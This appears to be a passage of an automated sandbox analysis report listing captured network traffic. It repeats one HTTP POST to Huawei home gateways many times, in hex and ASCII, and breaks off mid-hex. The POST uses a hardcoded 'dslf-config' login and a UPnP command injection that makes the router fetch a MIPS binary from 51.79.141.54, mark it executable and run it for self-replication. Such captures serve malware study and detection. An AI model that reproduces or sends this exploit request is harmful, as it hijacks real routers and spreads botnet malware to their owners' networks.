66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 